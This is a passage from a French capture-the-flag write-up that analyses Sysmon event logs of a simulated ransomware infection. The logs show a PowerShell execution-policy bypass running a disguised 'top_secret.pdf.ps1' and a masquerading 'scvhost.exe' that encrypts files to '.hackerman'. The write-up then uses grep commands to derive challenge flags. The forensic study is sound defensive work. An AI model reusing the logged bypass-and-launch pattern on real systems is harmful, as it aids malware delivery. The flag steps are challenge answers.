Windows® Operating System<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">510624</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:01.639<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
<span class="s2">"</span><span class="m">2019</span>-09-27T08:28:00.000Z<span class="s2">","</span>DESKTOP-F5ERMDT<span class="s2">",,,,"</span>SYSTEM<span class="s2">","</span>User<span class="s2">",,"</span>Process Create <span class="o">(</span>rule: ProcessCreate<span class="o">)</span><span class="s2">","</span>Microsoft-Windows-Sysmon/Operational<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>Microsoft Corporation<span class="s2">",,"</span>E:<span class="se">\"</span>,<span class="s2">"Windows PowerShell"</span>,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"1"</span>,<span class="s2">"2019-09-27 10:28:01"</span>,<span class="s2">"INFO"</span>,<span class="s2">"10.0.17763.1 (WinBuild.160101.0800)"</span>,<span class="s2">"01DNRXB4M2QN12SYTBJM471EHC"</span>,,,<span class="s2">"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F"</span>,<span class="s2">"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"</span>,,<span class="s2">"Medium"</span>,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,<span class="s2">"{6b71f96b-c4e0-5d8d-0000-00204f250900}"</span>,<span class="s2">"0x9254f"</span>,<span class="s2">"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:28:00.767\\r\\nP"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,<span class="s2">"PowerShell.EXE"</span>,<span class="s2">"C:\Windows\Explorer.EXE"</span>,<span class="s2">"C:\Windows\explorer.exe"</span>,<span class="s2">"{6b71f96b-c4e5-5d8d-0000-001074f30a00}"</span>,<span class="s2">"5320"</span>,,<span class="s2">"{6b71f96b-c810-5d8d-0000-0010eeae3600}"</span>,<span class="s2">"3252"</span>,,<span class="s2">"Microsoft® Windows® Operating System"</span>,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"510093"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,,,<span class="s2">"1"</span>,<span class="s2">"1"</span>,<span class="s2">"5048"</span>,,<span class="s2">"DESKTOP-F5ERMDT\robert"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:28:00.767"</span>,<span class="s2">"5"</span>
<span class="s2">"2019-09-27T08:28:00.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"</span>,<span class="s2">"Microsoft Corporation"</span>,,<span class="s2">"C:\Windows"</span>,<span class="s2">"Console Window Host"</span>,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"1"</span>,<span class="s2">"2019-09-27 10:28:01"</span>,<span class="s2">"INFO"</span>,<span class="s2">"10.0.17763.1 (WinBuild.160101.0800)"</span>,<span class="s2">"01DNRXB4MHZ0RCMJMTRQPT1XRX"</span>,,,<span class="s2">"SHA1=A32A03532A2AC2CA9C9F67FF4E7FB45680985DF9,MD5=4C41666923A14DC687DEEE3B143AFB55,SHA256=4DD0F069254FE5577D5A478B70093049B4E062BB7760094E50090F6790456DAE,IMPHASH=76923AA1BF85799F169FC2A8BB03894A"</span>,<span class="s2">"C:\Windows\System32\conhost.exe"</span>,,<span class="s2">"Medium"</span>,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,<span class="s2">"{6b71f96b-c4e0-5d8d-0000-00204f250900}"</span>,<span class="s2">"0x9254f"</span>,<span class="s2">"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:28:00.778\\r\\nP"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,<span class="s2">"CONHOST.EXE"</span>,<span class="s2">"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; &amp; 'E:\top_secret.pdf.ps1'"""</span>,<span class="s2">"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"</span>,<span class="s2">"{6b71f96b-c810-5d8d-0000-0010eeae3600}"</span>,<span class="s2">"9072"</span>,,<span class="s2">"{6b71f96b-c810-5d8d-0000-00101bb03600}"</span>,<span class="s2">"3252"</span>,,<span class="s2">"Microsoft® Windows® Operating System"</span>,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"510113"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,,,<span class="s2">"1"</span>,<span class="s2">"1"</span>,<span class="s2">"5048"</span>,,<span class="s2">"DESKTOP-F5ERMDT\robert"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:28:00.778"</span>,<span class="s2">"5"</span>
<span class="s2">"2019-09-27T08:28:00.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,,,,<span class="s2">"Process Creation"</span>,<span class="s2">"Security"</span>,<span class="s2">"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; &amp; 'E:\top_secret.pdf.ps1'"""</span>,,,,,,,<span class="s2">"4688"</span>,<span class="s2">"2019-09-27 10:28:02"</span>,<span class="s2">"AUDIT_SUCCESS"</span>,,<span class="s2">"01DNRXB5S8Z2H46S6EW7E5ZD4Q"</span>,,,,,,,<span class="s2">"-9214364837600034816"</span>,<span class="s2">"6"</span>,,,<span class="s2">"A new process has been created.\\r\\n\\r\\nCreator Subject:\\r\\n Security I"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,,,,,,,,<span class="s2">"4"</span>,,,<span class="s2">"{54849625-5478-4994-A5BA-3E3B0328C30D}"</span>,<span class="s2">"66720"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Security-Auditing"</span>,,,,,<span class="s2">"DESKTOP-F5ERMDT"</span>,<span class="s2">"0x9254f"</span>,<span class="s2">"robert"</span>,<span class="s2">"S-1-5-21-4014005275-3135484918-1388781346-1001"</span>,,,,,,<span class="s2">"13312"</span>,,<span class="s2">"1800"</span>,,,,,<span class="s2">"2"</span>
<span class="s2">"2019-09-27T08:28:11.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"""E:\scvhost.exe"""</span>,<span class="s2">"?"</span>,,<span class="s2">"E:\","</span>?<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:12<span class="s2">","</span>INFO<span class="s2">","</span>?<span class="s2">","</span>01DNRXBFGMQ28DXDKZ2H3KNJJE<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>AB46FD10A9562CDDA95B0EB5DD475BC5E41DA55E,MD5<span class="o">=</span>79F0ED40895935BFF57D763B63B77DA2,SHA256<span class="o">=</span>F20AC7A598D2BDC4FE4F1936BFCB5C0A0406A4E66D292578783B77552F7E5F3C,IMPHASH<span class="o">=</span>FC40519AF20116C903E3FF836E366E39<span class="s2">","</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.717<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>?<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c810-5d8d-0000-0010eeae3600<span class="o">}</span><span class="s2">","</span><span class="m">9072</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c81b-5d8d-0000-0010ed433700<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>?<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">511649</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.717<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
</code></pre></div>
<p>Mais dans ces entrées, il n'y avait rien qui s'apparentait à des modifications sur les fichiers excepté la création d'un lien vers <code>top_secret.pdf.ps1</code> dans <code>C:\Users\robert\AppData\Roaming\Microsoft\Windows\Recent</code>.</p>
<p>Nous avons alors regardé les processus créés par <code>top_secret.pdf.ps1</code> :</p>
<div class="highlight"><pre><span></span><code>$ grep -E <span class="s1">'Process Create.*top_secret.pdf.ps1'</span> logs.csv
<span class="s2">"2019-09-27T08:28:01.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&amp; 'C:\Program Files\7-Zip\7z.exe' x .\robber.pdf.7z -pazerty -aoa"""</span>,<span class="s2">"Microsoft Corporation"</span>,,<span class="s2">"E:\","</span>Windows PowerShell<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:02<span class="s2">","</span>INFO<span class="s2">","</span><span class="m">10</span>.0.17763.1 <span class="o">(</span>WinBuild.160101.0800<span class="o">)</span><span class="s2">","</span>01DNRXB6012401ETD2VY33ZBRB<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5<span class="o">=</span>7353F60B1739074EB17C5F4DDDEFE239,SHA256<span class="o">=</span>DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH<span class="o">=</span>741776AACCFC5B71FF59832DCDCACE0F<span class="s2">","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:01.639<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>PowerShell.EXE<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c810-5d8d-0000-0010eeae3600<span class="o">}</span><span class="s2">","</span><span class="m">9072</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c811-5d8d-0000-00105ae93600<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>Microsoft® Windows® Operating System<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">510624</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:01.639<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
<span class="s2">"</span><span class="m">2019</span>-09-27T08:28:00.000Z<span class="s2">","</span>DESKTOP-F5ERMDT<span class="s2">",,,,"</span>SYSTEM<span class="s2">","</span>User<span class="s2">",,"</span>Process Create <span class="o">(</span>rule: ProcessCreate<span class="o">)</span><span class="s2">","</span>Microsoft-Windows-Sysmon/Operational<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>Microsoft Corporation<span class="s2">",,"</span>E:<span class="se">\"</span>,<span class="s2">"Windows PowerShell"</span>,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"1"</span>,<span class="s2">"2019-09-27 10:28:01"</span>,<span class="s2">"INFO"</span>,<span class="s2">"10.0.17763.1 (WinBuild.160101.0800)"</span>,<span class="s2">"01DNRXB4M2QN12SYTBJM471EHC"</span>,,,<span class="s2">"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F"</span>,<span class="s2">"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"</span>,,<span class="s2">"Medium"</span>,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,<span class="s2">"{6b71f96b-c4e0-5d8d-0000-00204f250900}"</span>,<span class="s2">"0x9254f"</span>,<span class="s2">"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:28:00.767\\r\\nP"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,<span class="s2">"PowerShell.EXE"</span>,<span class="s2">"C:\Windows\Explorer.EXE"</span>,<span class="s2">"C:\Windows\explorer.exe"</span>,<span class="s2">"{6b71f96b-c4e5-5d8d-0000-001074f30a00}"</span>,<span class="s2">"5320"</span>,,<span class="s2">"{6b71f96b-c810-5d8d-0000-0010eeae3600}"</span>,<span class="s2">"3252"</span>,,<span class="s2">"Microsoft® Windows® Operating System"</span>,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"510093"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,,,<span class="s2">"1"</span>,<span class="s2">"1"</span>,<span class="s2">"5048"</span>,,<span class="s2">"DESKTOP-F5ERMDT\robert"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:28:00.767"</span>,<span class="s2">"5"</span>
<span class="s2">"2019-09-27T08:28:00.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"</span>,<span class="s2">"Microsoft Corporation"</span>,,<span class="s2">"C:\Windows"</span>,<span class="s2">"Console Window Host"</span>,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"1"</span>,<span class="s2">"2019-09-27 10:28:01"</span>,<span class="s2">"INFO"</span>,<span class="s2">"10.0.17763.1 (WinBuild.160101.0800)"</span>,<span class="s2">"01DNRXB4MHZ0RCMJMTRQPT1XRX"</span>,,,<span class="s2">"SHA1=A32A03532A2AC2CA9C9F67FF4E7FB45680985DF9,MD5=4C41666923A14DC687DEEE3B143AFB55,SHA256=4DD0F069254FE5577D5A478B70093049B4E062BB7760094E50090F6790456DAE,IMPHASH=76923AA1BF85799F169FC2A8BB03894A"</span>,<span class="s2">"C:\Windows\System32\conhost.exe"</span>,,<span class="s2">"Medium"</span>,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,<span class="s2">"{6b71f96b-c4e0-5d8d-0000-00204f250900}"</span>,<span class="s2">"0x9254f"</span>,<span class="s2">"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:28:00.778\\r\\nP"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,<span class="s2">"CONHOST.EXE"</span>,<span class="s2">"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; &amp; 'E:\top_secret.pdf.ps1'"""</span>,<span class="s2">"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"</span>,<span class="s2">"{6b71f96b-c810-5d8d-0000-0010eeae3600}"</span>,<span class="s2">"9072"</span>,,<span class="s2">"{6b71f96b-c810-5d8d-0000-00101bb03600}"</span>,<span class="s2">"3252"</span>,,<span class="s2">"Microsoft® Windows® Operating System"</span>,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"510113"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,,,<span class="s2">"1"</span>,<span class="s2">"1"</span>,<span class="s2">"5048"</span>,,<span class="s2">"DESKTOP-F5ERMDT\robert"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:28:00.778"</span>,<span class="s2">"5"</span>
<span class="s2">"2019-09-27T08:28:11.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"""E:\scvhost.exe"""</span>,<span class="s2">"?"</span>,,<span class="s2">"E:\","</span>?<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:12<span class="s2">","</span>INFO<span class="s2">","</span>?<span class="s2">","</span>01DNRXBFGMQ28DXDKZ2H3KNJJE<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>AB46FD10A9562CDDA95B0EB5DD475BC5E41DA55E,MD5<span class="o">=</span>79F0ED40895935BFF57D763B63B77DA2,SHA256<span class="o">=</span>F20AC7A598D2BDC4FE4F1936BFCB5C0A0406A4E66D292578783B77552F7E5F3C,IMPHASH<span class="o">=</span>FC40519AF20116C903E3FF836E366E39<span class="s2">","</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.717<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>?<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c810-5d8d-0000-0010eeae3600<span class="o">}</span><span class="s2">","</span><span class="m">9072</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c81b-5d8d-0000-0010ed433700<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>?<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">511649</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.717<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
</code></pre></div>
<p>Et on voit qu'il exécute un autre fichier présent sur la clé : scvhost.exe dont le nom ressemble beaucoup à un processus natif de windows : svchost.exe (hôte de service).</p>
<p>En recherchant les entrées de logs pour ce processus, on remarque qu'il y a beaucoup d'entrées de type FileCreate avec des noms de fichiers classiques auxquels on rajoute l'extension <code>.hackerman</code> (ex : <code>C:\Users\robert\Pictures\Lighthouse.jpg.hackerman</code>).</p>
<p>Nous en avons déduit que ces fichiers étaient les fichiers chiffrés par le ransomware.</p>
<p>Pour les compter, les commandes <code>grep</code> et <code>wc</code> sont suffisantes :</p>
<div class="highlight"><pre><span></span><code>$ grep -E <span class="s1">'FileCreate.*\.hackerman\"'</span> logs.csv <span class="p">|</span> wc -l
<span class="m">2779</span>
$ grep -E <span class="s1">'FileCreate.*\.hackerman\"'</span> logs.csv <span class="p">|</span> wc -l <span class="p">|</span> tr --delete <span class="s1">'\n'</span> <span class="p">|</span> sha1sum <span class="p">|</span> sed -E <span class="s1">'s/^(.)(.*)(.) -/ECW{\1\2\3}/'</span>
ECW<span class="o">{</span><span class="m">958</span>...72b<span class="o">}</span>
</code></pre></div>
<h1>Persistances</h1>
<p>Malheureusement, nous n'avons pas eu le temps de trouver ce dernier flag pendant le CTF mais voici quand même sa résolution.</p>
<p>Etant donné que nous avons trouvé que la logique du ransomware se situe majoritairement dans le programme scvhost.exe, nous avons cherché les processus créés par scvhost.exe :</p>
<div class="highlight"><pre><span></span><code>$ grep -E <span class="s1">'Process Create.*scvhost.exe'</span> logs.csv <span class="p">|</span> grep -v <span class="s1">'top_secret.pdf.ps1'</span>
<span class="s2">"2019-09-27T08:28:12.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"""E:\scvhost.exe"""</span>,<span class="s2">"?"</span>,,<span class="s2">"E:\","</span>?<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:13<span class="s2">","</span>INFO<span class="s2">","</span>?<span class="s2">","</span>01DNRXBGJ64GV4QYSY9QHDF8Q6<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>AB46FD10A9562CDDA95B0EB5DD475BC5E41DA55E,MD5<span class="o">=</span>79F0ED40895935BFF57D763B63B77DA2,SHA256<span class="o">=</span>F20AC7A598D2BDC4FE4F1936BFCB5C0A0406A4E66D292578783B77552F7E5F3C,IMPHASH<span class="o">=</span>FC40519AF20116C903E3FF836E366E39<span class="s2">","</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:12.226<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>?<span class="s2">","""</span>E:<span 